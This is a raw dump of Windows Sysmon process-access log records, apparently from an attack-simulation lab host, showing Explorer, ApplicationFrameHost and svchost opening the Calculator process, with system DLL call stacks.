10341000x8000000000000000360318Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360317Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360316Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360315Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360314Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360313Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360312Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+78dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4
10341000x8000000000000000360311Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6cfd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4
10341000x8000000000000000360310Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360309Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360308Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6c97|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6bab|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f
10341000x8000000000000000360307Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6b1a|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4
10341000x8000000000000000360306Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360305Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360304Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360303Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360302Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360301Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360300Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+78223|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360299Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1aaef|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360298Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360297Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360296Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360295Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.671{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360294Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.671{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 